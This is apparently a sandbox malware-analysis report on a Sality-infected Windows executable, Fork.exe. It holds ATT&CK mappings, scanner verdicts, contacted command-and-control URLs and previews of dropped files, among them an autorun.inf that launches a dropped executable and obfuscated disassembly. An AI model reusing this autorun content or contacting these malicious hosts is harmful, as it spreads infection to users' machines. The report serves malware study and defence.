      Obfuscated Files or Information      		LSA Secrets3
      File and Directory Discovery      		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
      Software Packing      		Cached Domain Credentials12
      System Information Discovery      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
      DLL Side-Loading      		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
      Bypass User Account Control      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Fork.exe86%VirustotalBrowse
      Fork.exe97%ReversingLabsWin32.Virus.Sality
      Fork.exe100%AviraW32/Sality.AT

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\winrhbwc.exe100%AviraW32/Sality.AT
      C:\doxt.pif100%AviraW32/Sality.AT

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://arimaexim.com/logo.gif?3db8193=582454827100%Avira URL Cloudmalware
      http://arimaexim.com/logo.gif?1308dd2=179633250100%Avira URL Cloudmalware
      http://arimaexim.com/logo.gif?cb4dd6=106589872100%Avira URL Cloudmalware
      http://arimaexim.com/logo.gif?18828d2=179903934100%Avira URL Cloudmalware
      http://bhagavatirannade.org/logo.gif?175d7eb=196001624100%Avira URL Cloudphishing
      http://bhagavatirannade.org/logo.gif?1e72e91=159639765100%Avira URL Cloudphishing
      http://bhagavatirannade.org/logo.gif?47a8101=225411843100%Avira URL Cloudphishing
      http://arimaexim.com/logo.gif?79b3d2=31903560100%Avira URL Cloudmalware
      http://bhagavatirannade.org/logo.gif?b2e175=46892500100%Avira URL Cloudphishing
      http://bhagavatirannade.org/logo.gif?2f2bdaf=494627030100%Avira URL Cloudphishing
      http://arimaexim.com/logo.gif?3115e42=514698900100%Avira URL Cloudmalware
      http://bhagavatirannade.org/logo.gif?263b431=280620375100%Avira URL Cloudphishing
      http://bhagavatirannade.org/logo.gif?1113539=107429718100%Avira URL Cloudphishing
      http://arimaexim.com/logo.gif?282bcc5=294857059100%Avira URL Cloudmalware
      http://bhagavatirannade.org/logo.gif?6b3a03=28108812100%Avira URL Cloudphishing
      http://bhagavatirannade.org/logo.gif?3925b70=239693248100%Avira URL Cloudphishing
      http://arimaexim.com/logo.gif?2063744=237732572100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      arimaexim.com
      		3.229.117.57
      		truefalse
        		high
        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
        		217.20.57.19
        		truefalse
          		high
          bhagavatirannade.org
          		3.229.117.57
          		truefalse
            		high
            pki-goog.l.google.com
            		142.250.186.163
            		truefalse
              		high
              al-somow.com
              		unknown
              		unknownfalse
                		high
                ankara-cambalkon.net
                		unknown
                		unknownfalse
                  		high
                  businecessity.com
                  		unknown
                  		unknownfalse
                    		high
                    amnisure.com.tr
                    		unknown
                    		unknownfalse
                      		high
                      yeni.antalyahilal.com
                      		unknown
                      		unknownfalse
                        		high
                        aocuoikhanhlinh.vn
                        		unknown
                        		unknownfalse
                          		high
                          c.pki.goog
                          		unknown
                          		unknownfalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://arimaexim.com/logo.gif?3db8193=582454827true
                            • Avira URL Cloud: malware
                            		unknown
                            http://arimaexim.com/logo.gif?1308dd2=179633250true
                            • Avira URL Cloud: malware
                            		unknown
                            http://bhagavatirannade.org/logo.gif?47a8101=225411843true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://bhagavatirannade.org/logo.gif?175d7eb=196001624true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://arimaexim.com/logo.gif?18828d2=179903934true
                            • Avira URL Cloud: malware
                            		unknown
                            http://arimaexim.com/logo.gif?cb4dd6=106589872true
                            • Avira URL Cloud: malware
                            		unknown
                            http://bhagavatirannade.org/logo.gif?2f2bdaf=494627030true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://bhagavatirannade.org/logo.gif?1e72e91=159639765true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://bhagavatirannade.org/logo.gif?b2e175=46892500true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://arimaexim.com/logo.gif?79b3d2=31903560true
                            • Avira URL Cloud: malware
                            		unknown
                            http://arimaexim.com/logo.gif?3115e42=514698900true
                            • Avira URL Cloud: malware
                            		unknown
                            http://bhagavatirannade.org/logo.gif?3925b70=239693248true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://bhagavatirannade.org/logo.gif?263b431=280620375true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://bhagavatirannade.org/logo.gif?1113539=107429718true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://arimaexim.com/logo.gif?282bcc5=294857059true
                            • Avira URL Cloud: malware
                            		unknown
                            http://bhagavatirannade.org/logo.gif?6b3a03=28108812true
                            • Avira URL Cloud: phishing
                            		unknown
                            http://arimaexim.com/logo.gif?2063744=237732572true
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://businecessity.com/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://yeni.antalyahilal.com/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                http://arimaexim.com/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://aocuoikhanhlinh.vn/images/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.akpartisariveliler.com/images/img.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://businecessity.com/logo.gifhttp://al-somow.com/images/logo.gifhttp://amnisure.com.tr/images/loFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://amnisure.com.tr/images/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://abb.ind.in/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://ankara-cambalkon.net/images/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://al-somow.com/images/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://abb.ind.in/logo.gifhttp://www.akpartisariveliler.com/images/img.gif4j14/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://bhagavatirannade.org/logo.gifFork.exe, 00000000.00000003.964569087.00000000007C5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    3.229.117.57
                                                    		arimaexim.comUnited States
                                                    		14618AMAZON-AESUSfalse
                                                    46.98.127.9
                                                    		unknownUkraine
                                                    		15377FREGATUAfalse

                                                    General Information

                                                    Joe Sandbox version:42.0.0 Malachite
                                                    Analysis ID:1640074
                                                    Start date and time:2025-03-16 23:03:16 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 7m 25s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:39
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:3
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Sample name:Fork.exe
                                                    Detection:MAL
                                                    Classification:mal100.spre.troj.evad.winEXE@149/5@30/2
                                                    EGA Information:Failed
                                                    HCA Information:
                                                    • Successful, ratio: 100%
                                                    • Number of executed functions: 0
                                                    • Number of non-executed functions: 0
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe

                                                    Warnings

                                                    • Connection to analysis system has been lost, crash info: Unknown
                                                    • Exclude process from analysis (whitelisted): SIHClient.exe, ApplicationFrameHost.exe
                                                    • Excluded IPs from analysis (whitelisted): 52.149.20.212, 20.3.187.198
                                                    • Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                                    • Report size getting too big, too many NtSetValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    18:04:24API Interceptor370x Sleep call for process: Fork.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    3.229.117.57Fleeg.exeGet hashmaliciousBabadeda, SalityBrowse
                                                    • bhagavatirannade.org/logo.gif?2e48899=436784481
                                                    fg2010-collabvm.exeGet hashmaliciousSalityBrowse
                                                    • arimaexim.com/logo.gif?b98e32=85123934
                                                    hello3.exeGet hashmaliciousSalityBrowse
                                                    • bhagavatirannade.org/logo.gif?42a305=39303981
                                                    freetit.exeGet hashmaliciousSalityBrowse
                                                    • arimaexim.com/logo.gif?146af87=214096710
                                                    facebookpro.exeGet hashmaliciousSalityBrowse
                                                    • arimaexim.com/logo.gif?e3fd293e=1005330610
                                                    Glass2k.exeGet hashmaliciousSalityBrowse
                                                    • bhagavatirannade.org/logo.gif?6e7f4a=14483092
                                                    ELVES.EXE.exeGet hashmaliciousSalityBrowse
                                                    • arimaexim.com/logo.gif?1afe4179=-219132607
                                                    theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                                    • arimaexim.com/logo.gif?7d92ba8=790038000
                                                    cobratek-pc-info-free-1-0-2-0.exeGet hashmaliciousSalityBrowse
                                                    • bhagavatirannade.org/logo.gif?b02979=57724765
                                                    CV_Sales Representative - Job Request PDF.exeGet hashmaliciousFormBookBrowse
                                                    • reczwga.biz/fu
                                                    46.98.127.9Fleeg.exeGet hashmaliciousBabadeda, SalityBrowse
                                                      fishing_rod.exeGet hashmaliciousSalityBrowse
                                                        fg2010-collabvm.exeGet hashmaliciousSalityBrowse
                                                          hello3.exeGet hashmaliciousSalityBrowse
                                                            freetit.exeGet hashmaliciousSalityBrowse
                                                              facebookpro.exeGet hashmaliciousSalityBrowse
                                                                Glass2k.exeGet hashmaliciousSalityBrowse
                                                                  ELVES.EXE.exeGet hashmaliciousSalityBrowse
                                                                    theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                                                      cobratek-pc-info-free-1-0-2-0.exeGet hashmaliciousSalityBrowse

                                                                        Domains

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        arimaexim.comFleeg.exeGet hashmaliciousBabadeda, SalityBrowse
                                                                        • 3.229.117.57
                                                                        fg2010-collabvm.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        hello3.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        freetit.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        facebookpro.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        ELVES.EXE.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        cobratek-pc-info-free-1-0-2-0.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        VirusShare_6623297b20fa16eb42b992b6c55c53cd.exeGet hashmaliciousSalityBrowse
                                                                        • 44.200.87.10
                                                                        VirusShare_53518afe3805b8b43ae97946b65a0d018804c78ecbec76d3dce7967aa87a64a2.exeGet hashmaliciousUnknownBrowse
                                                                        • 44.200.87.10
                                                                        bhagavatirannade.orgFleeg.exeGet hashmaliciousBabadeda, SalityBrowse
                                                                        • 3.229.117.57
                                                                        fg2010-collabvm.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        hello3.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        freetit.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        facebookpro.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        Glass2k.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        ELVES.EXE.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        cobratek-pc-info-free-1-0-2-0.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        VirusShare_6623297b20fa16eb42b992b6c55c53cd.exeGet hashmaliciousSalityBrowse
                                                                        • 44.200.87.10
                                                                        edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comtheants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                                                        • 217.20.57.34
                                                                        AgnotSecurity.exeGet hashmaliciousUnknownBrowse
                                                                        • 217.20.57.36
                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                        • 84.201.210.23
                                                                        GalaxySoft.exeGet hashmaliciousLummaC StealerBrowse
                                                                        • 217.20.57.20
                                                                        Down-2021.exeGet hashmaliciousUnknownBrowse
                                                                        • 217.20.57.20
                                                                        GlitchNote.exeGet hashmaliciousUnknownBrowse
                                                                        • 217.20.57.20
                                                                        MBRWrite.exeGet hashmaliciousUnknownBrowse
                                                                        • 217.20.57.20
                                                                        Setup.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                                                        • 217.20.57.19
                                                                        v7942.exeGet hashmaliciousStealc, VidarBrowse
                                                                        • 217.20.57.35
                                                                        dBKUxeI.exeGet hashmaliciousAsyncRAT, DarkVision RatBrowse
                                                                        • 217.20.57.34

                                                                        ASNs

                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                        AMAZON-AESUSFleeg.exeGet hashmaliciousBabadeda, SalityBrowse
                                                                        • 3.229.117.57
                                                                        fg2010-collabvm.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        hello3.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        freetit.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        facebookpro.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        Glass2k.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        ELVES.EXE.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        cobratek-pc-info-free-1-0-2-0.exeGet hashmaliciousSalityBrowse
                                                                        • 3.229.117.57
                                                                        winscp.exeGet hashmaliciousCobaltStrikeBrowse
                                                                        • 34.239.115.225
                                                                        FREGATUAFleeg.exeGet hashmaliciousBabadeda, SalityBrowse
                                                                        • 46.98.127.9
                                                                        fishing_rod.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9
                                                                        fg2010-collabvm.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9
                                                                        hello3.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9
                                                                        freetit.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9
                                                                        facebookpro.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9
                                                                        Glass2k.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9
                                                                        ELVES.EXE.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9
                                                                        theants-2.0.3-Setup-dkp3z.7x5ols.spqn44#U007ex.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9
                                                                        cobratek-pc-info-free-1-0-2-0.exeGet hashmaliciousSalityBrowse
                                                                        • 46.98.127.9

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\6028.tmp\6029.tmp\602A.bat

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:ASCII text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):37
                                                                        Entropy (8bit):4.283381405994075
                                                                        Encrypted:false
                                                                        SSDEEP:3:NNgM1XjTIk9Jdn:NNvd9Jd
                                                                        MD5:C8D1D19D53EFDDECD70439DC20CBE2B5
                                                                        SHA1:6590D383E1F913C94487E69039F206D3540FC968
                                                                        SHA-256:431FF20556EEFD5927E524630192890B0CB6167B2E4B42C45A8ADD91516432C9
                                                                        SHA-512:213F92939A6048F5738D052847F22F5AA461B37831EAD166E420A29543B91BCB57F49889D8988FBA85F9593F64188DFC48BF75015CDAD5EDE00A94325A1FAA5C
                                                                        Malicious:false
                                                                        Preview:@shift /0..:1..start calc.exe..goto 1

                                                                        C:\Users\user\AppData\Local\Temp\winrhbwc.exe

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):78848
                                                                        Entropy (8bit):7.982645582855012
                                                                        Encrypted:false
                                                                        SSDEEP:1536:l74b7OFGeQORHXXHXq+WrSWOgM4HbJRU4+XWjkTAwOLm7FP9:lqYQwLWrct4+XW4UvAl
                                                                        MD5:862A8BDA02C0C7AC93B43721D1EE5A4F
                                                                        SHA1:D9B1A6EFF2B060C775AE91A57F9F4BC3097C42DD
                                                                        SHA-256:0A2D9ADAC15BBB8CB486421375F4E3E726A9BA009007A8EC1F535058821060EB
                                                                        SHA-512:839F80466BC2A324202DEC9E9D3220849F223280CCE3010CB6BFF44D31A7D5C07575D9A253FC81F0AE5250D06043946691D71471367F161D505A0BFC866BA61F
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\Users\user\AppData\Local\Temp\winrhbwc.exe, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................P..............................................`...<....................................................................................................................text....@.......2................I. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............Z......R...........@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................

                                                                        C:\Windows\system.ini

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:Windows SYSTEM.INI
                                                                        Category:dropped
                                                                        Size (bytes):255
                                                                        Entropy (8bit):5.257369747130434
                                                                        Encrypted:false
                                                                        SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtPN:F4Yv7yk3OUBq82wqFtPN
                                                                        MD5:C52FD1A23D8870641596964016992BD3
                                                                        SHA1:0A8DA17BFF3C933E912ADE7792F28169D243286D
                                                                        SHA-256:C5276DC96E61DC8B7BFF9F2035D4F707AC03995E4A0BC4E596DC87F5296C7A61
                                                                        SHA-512:6E3686080DE0A2F718F95433FDC4D2D8B735A0DE4E6608F7EA13A8A7F7E7F44B3472E26EA7ACF076A4F3520030D2D0A36B401198D6EF26C76C57E0815E7EEBA0
                                                                        Malicious:false
                                                                        Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=61850001942..

                                                                        C:\autorun.inf

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:Microsoft Windows Autorun file
                                                                        Category:dropped
                                                                        Size (bytes):356
                                                                        Entropy (8bit):5.595076791270881
                                                                        Encrypted:false
                                                                        SSDEEP:6:DNvLBTWE4U15/CvNnEina/yryCAtp0QofmAqsFuHnMJYxkL:D7f4U15/sNn1RIp0Qou1bHnMnL
                                                                        MD5:C0CA8A2DBDD5D9E32E0D257039A01DD1
                                                                        SHA1:C2FDD819BAA54BBC9DAFCE7624EA2BE1965C50DD
                                                                        SHA-256:8E49389CE2B56530D0A6CB0C460BA56215E74D060E4552E54076FDC191AF0FF7
                                                                        SHA-512:AD3C17A46A1876FD03C04340319F7D8801DFDCDC73414FABD0EC0C030AFA6DE7E8161DF790B0AFC60058EDD4DE8B509FB67C312D2D83CE460D362635D1168FE6
                                                                        Malicious:true
                                                                        Preview:;tRipc hPjbGFNjtxuj WEee caCARlHivuptqDmsnHVeIJ kwwfjadYgiN..[AutoRun]..;pbccNvtPSCjedqXp..;wkSa aTmCo AodIvpaddKXSvcJ ..ShELL\Open\cOMMaND =doxt.pif..;Brhfw ygqfSGghLnqL uvmviO VHrxnHxh aDCmi..SHeLl\exPlOre\CoMmAND=doxt.pif....;DXuklXoOppbeagtWAarfLkmcd weYCJbyt..oPEn= doxt.pif..;nQbdVPrkctuteXR..sHElL\OpEN\DEFauLt=1..sheLL\autOplaY\cOMmaND =doxt.pif..

                                                                        C:\doxt.pif

                                                                        Download File
                                                                        Process:C:\Users\user\Desktop\Fork.exe
                                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Category:modified
                                                                        Size (bytes):103140
                                                                        Entropy (8bit):7.45852217673114
                                                                        Encrypted:false
                                                                        SSDEEP:1536:l74b7OFGeQORHXXHXq+WrSWOgM4HbJRU4+XWjkTAwOLm7FP+E0m:lqYQwLWrct4+XW4UvA1Z
                                                                        MD5:573CDB07832CD258EBEF81DB8FF7ED1C
                                                                        SHA1:EF4839692E7F776306B236264437E29EB12512C9
                                                                        SHA-256:4C896D061790661AE844E699CD33D0FE17DC3BB6E16824C10D175A8A5F79ED79
                                                                        SHA-512:509C0EF5C4FEB7A0F07D0AD04AF84AD06B86B671792D4CD620BAE7BA920F12A18F5D0B6EEEA02019EEDBB53CAB29EF418946995455EB2041892EA75CE524E8FF
                                                                        Malicious:true
                                                                        Yara Hits:
                                                                        • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\doxt.pif, Author: ditekSHen
                                                                        Antivirus:
                                                                        • Antivirus: Avira, Detection: 100%
                                                                        Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................P..............................................`...<....................................................................................................................text....@.......2................I. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............Z......R...........@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.516531445379103
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.94%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • VXD Driver (31/22) 0.00%
                                                                        File name:Fork.exe
                                                                        File size:233'472 bytes
                                                                        MD5:63b6cebefec52083ac42eb8a39ab6683
                                                                        SHA1:fb5be20e9327a66f05ff29b8458d0237c10ef7d6
                                                                        SHA256:6702fef486a9118c11cbd50a3d920950a3e239332b4e2edc7ae84bd3c8951191
                                                                        SHA512:da1c7a7a4eac6648bdec3ac82948f04fc481f7796908eb993dcf2684df1b8edb16818c1089687f8411985f33f888ec9af3e12b2adfddcd5daa8b6024d9916b19
                                                                        SSDEEP:6144:EzBkLL2NTBcvWehVy6XLLw5BakNTfpB7pk/ppK:EKyNT+vWCYULwnAK
                                                                        TLSH:8434DF45B3E246B6E2E2453201F6E33AA335AE545B10EED7C3DE6C037D516C4AA342F9
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....usZ...............2.....d............... ....@........................................................................

                                                                        File Icon

                                                                        Icon Hash:5e1f3d59b34d090f

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x401000
                                                                        Entrypoint Section:.code
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x5A7375F8 [Thu Feb 1 20:18:00 2018 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:5877688b4859ffd051f6be3b8e0cd533

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        mov al, 00000031h
                                                                        xchg ecx, edi
                                                                        mov cl, ch
                                                                        imul edx, ebp, 5FDDB9FDh
                                                                        mov al, ah
                                                                        imul ecx, esi
                                                                        and eax, 92F5D586h
                                                                        cmp ebp, 90874722h
                                                                        movzx ecx, ch
                                                                        mov ecx, 888B276Fh
                                                                        lea edx, dword ptr [9FC43AC8h]
                                                                        movzx ebx, bp
                                                                        test ecx, eax
                                                                        je 00007F37B8FF881Ah
                                                                        imul ecx, ebx, 0E0EFD6Ah
                                                                        dec edi
                                                                        call 00007F37B8FF8815h
                                                                        mov eax, E6FBC1F7h
                                                                        adc cl, FFFFFF9Ch
                                                                        imul esi, edi, 0784F607h
                                                                        adc esi, F3000005h
                                                                        xchg eax, ebx
                                                                        lea esi, dword ptr [956BC51Fh]
                                                                        test ebp, ebx
                                                                        push edx
                                                                        mov bl, 97h
                                                                        pop ecx
                                                                        xchg ebx, ebx
                                                                        imul esi, esi, 730400BDh
                                                                        or al, FFFFFFCEh
                                                                        xchg ebx, eax
                                                                        push ecx
                                                                        jbe 00007F37B8FF8818h
                                                                        imul eax, esi, C795DCE6h
                                                                        pop edi
                                                                        imul ebx, ebx, 0664F792h
                                                                        and eax, edx
                                                                        inc ebx
                                                                        mov ah, FFFFFFB8h
                                                                        test dl, FFFFFFC8h
                                                                        mov edx, edi
                                                                        mov bl, bh
                                                                        test ebx, eax
                                                                        cmp cl, bl
                                                                        pop eax
                                                                        jno 00007F37B8FF8817h
                                                                        mov ebx, ecx
                                                                        mov ch, 00000065h
                                                                        xchg edx, edx
                                                                        dec esi
                                                                        jmp 00007F37B8FF8814h
                                                                        sbb ecx, ecx
                                                                        mov edi, 2B8B9F75h
                                                                        test bh, dl
                                                                        mov bl, FFFFFFD9h
                                                                        and ebp, ecx
                                                                        lea ecx, dword ptr [E84740DDh]
                                                                        mov cl, bl
                                                                        mov ebx, esi
                                                                        cmp cl, al
                                                                        jc 00007F37B8FF8816h
                                                                        cmp edi, ebx
                                                                        test ebp, edx
                                                                        add eax, 000A3B9Fh
